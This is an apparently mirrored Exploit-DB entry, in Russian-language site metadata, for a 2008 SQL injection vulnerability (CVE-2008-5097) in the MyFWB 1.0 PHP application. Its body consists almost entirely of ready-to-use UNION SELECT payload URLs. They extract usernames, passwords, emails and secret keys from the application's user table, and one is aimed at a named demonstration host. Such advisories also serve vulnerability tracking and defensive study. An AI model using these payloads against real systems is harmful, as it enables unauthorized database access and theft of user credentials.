- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6501
- Проверка EDB
-
- Пройдено
- Автор
- 0X90
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5097
- Дата публикации
- 2008-09-20
Код:
MyFWB 1.0 Remote SQL Injection
Author: 0x90
url: www.0x90.com.ar
Product: MyFWB
download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip
Version: 1.0
URL: http://www.fsoft.co.nr/
Vulnerability Class: SQL Injection
contact: Guns[at]0x90[dot]com[dot]ar
Username:
http://host/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user
Password:
http://host/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user
Email:
http://host/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user
Secret Key:
http://host/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user
Online Demostration:
http://myfwb.co.cc/?page=-0x90+union+select+0,0,secret,0+from+user
# milw0rm.com [2008-09-20]- Источник
- www.exploit-db.com
